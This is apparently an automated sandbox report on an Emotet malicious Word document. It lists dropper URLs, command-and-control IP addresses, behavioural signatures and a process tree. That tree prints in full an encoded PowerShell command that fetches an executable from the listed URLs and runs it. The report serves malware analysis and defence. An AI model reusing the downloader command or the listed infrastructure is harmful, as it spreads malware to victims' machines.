Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    27-01-2020 22:14

General

  • Target

    36ac2022a195be91fe94937c96eb2532c925b440967f5fb9251160b5334e2fb8.doc

  • Sample

    200127-fyt8n196ke

  • SHA256

    36ac2022a195be91fe94937c96eb2532c925b440967f5fb9251160b5334e2fb8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://fietsenmetkinderen.info/App_Data/ASHFouI/

exe.dropper

https://rokonworld.xyz/cgi-bin/bf99ypv-nka70qs-62/

exe.dropper

http://www.meubelontwerpstudioheyne.nl/languages/ndZNarqnj/

exe.dropper

http://bursary.engsoc.queensu.ca/wp-admin/48ech-ddpjkzp-29821620/

exe.dropper

http://lapmangfpt.haiphong.vn/wp-admin/k50i2cm5qi-9wnfau-7879373385/

Extracted

Family

emotet

C2

195.250.143.182:80

184.162.115.11:443

70.60.238.62:80

68.183.18.169:8080

178.62.75.204:8080

178.33.167.120:8080

144.76.56.36:8080

216.75.37.196:8080

78.189.165.52:8080

185.192.75.240:443

202.229.211.95:80

190.5.162.204:80

24.141.12.228:80

41.185.29.128:8080

192.210.217.94:8080

110.2.118.164:80

203.153.216.178:7080

37.70.131.107:80

75.86.6.174:80

122.176.116.57:443

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\36ac2022a195be91fe94937c96eb2532c925b440967f5fb9251160b5334e2fb8.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:4964
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABOAGcAZgBwAGwAaAB1AGcAcwA9ACcAWABlAGoAawBhAGIAbwBoACcAOwAkAE8AbABpAGUAcwBjAGEAZgBzAG0AIAA9ACAAJwA0ADkAMQAnADsAJABKAHUAZAB6AGIAdABpAGsAPQAnAFcAcgBjAG0AZABvAHgAcgB1AGsAJwA7ACQATAB2AGoAeABwAHMAaQBlAGkAeQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAGwAaQBlAHMAYwBhAGYAcwBtACsAJwAuAGUAeABlACcAOwAkAEcAawB6AGoAcgB6AGQAZABmAGEAdwBqAD0AJwBNAGwAZgBiAHkAaAB6AHUAYQBuACcAOwAkAE0AcQBzAG8AZwBjAGQAawBiAHEAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAEIAYwBsAGkARQBuAHQAOwAkAE8AagBlAGEAZwBiAHkAYwBqAGcAeAA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBlAHQAcwBlAG4AbQBlAHQAawBpAG4AZABlAHIAZQBuAC4AaQBuAGYAbwAvAEEAcABwAF8ARABhAHQAYQAvAEEAUwBIAEYAbwB1AEkALwAqAGgAdAB0AHAAcwA6AC8ALwByAG8AawBvAG4AdwBvAHIAbABkAC4AeAB5AHoALwBjAGcAaQAtAGIAaQBuAC8AYgBmADkAOQB5AHAAdgAtAG4AawBhADcAMABxAHMALQA2ADIALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGUAdQBiAGUAbABvAG4AdAB3AGUAcgBwAHMAdAB1AGQAaQBvAGgAZQB5AG4AZQAuAG4AbAAvAGwAYQBuAGcAdQBhAGcAZQBzAC8AbgBkAFoATgBhAHIAcQBuAGoALwAqAGgAdAB0AHAAOgAvAC8AYgB1AHIAcwBhAHIAeQAuAGUAbgBnAHMAbwBjAC4AcQB1AGUAZQBuAHMAdQAuAGMAYQAvAHcAcAAtAGEAZABtAGkAbgAvADQAOABlAGMAaAAtAGQAZABwAGoAawB6AHAALQAyADkAOAAyADEANgAyADAALwAqAGgAdAB0AHAAOgAvAC8AbABhAHAAbQBhAG4AZwBmAHAAdAAuAGgAYQBpAHAAaABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAGsANQAwAGkAMgBjAG0ANQBxAGkALQA5AHcAbgBmAGEAdQAtADcAOAA3ADkAMwA3ADMAMwA4ADUALwAnAC4AIgBzAFAATABgAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFgAbQByAHAAcwB5AG0AbwBuAHMAYQBzAGIAPQAnAFAAZAB3AHYAdABwAHMAYwBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABCAG8AeABmAGwAZQB1AHYAIABpAG4AIAAkAE8AagBlAGEAZwBiAHkAYwBqAGcAeAApAHsAdAByAHkAewAkAE0AcQBzAG8AZwBjAGQAawBiAHEALgAiAEQAYABvAGAAdwBuAGwAYABPAEEARABmAEkATABlACIAKAAkAEIAbwB4AGYAbABlAHUAdgAsACAAJABMAHYAagB4AHAAcwBpAGUAaQB5AG8AKQA7ACQATQBqAHYAbQBrAG0AZAB0AGMAcQBtAHEAPQAnAFcAaQB4AHQAbABuAHoAcABiAGoAcQBlAHMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABMAHYAagB4AHAAcwBpAGUAaQB5AG8AKQAuACIATABgAEUATgBgAGcAdABIACIAIAAtAGcAZQAgADMAMAAyADkANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABMAHYAagB4AHAAcwBpAGUAaQB5AG8AKQA7ACQASwBmAGMAYQBtAGMAcwBiAD0AJwBPAGkAZwBxAGQAbgBvAHgAdwBnAHYAJwA7AGIAcgBlAGEAawA7ACQAWgBzAHcAaQBsAHYAZgB1AD0AJwBYAGcAZwBuAGgAawB1AHAAdgBsACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAagBrAGYAZABwAHUAcQBjAGkAYgBmAGQAPQAnAFQAZwBnAGMAdAB6AHkAaQBqAHgAYQAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:4548
    • C:\Users\Admin\491.exe
      "C:\Users\Admin\491.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:4756
      • C:\Users\Admin\491.exe
        --7c8dd3ca
        3⤵
        • Executes dropped EXE
        PID:4396

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads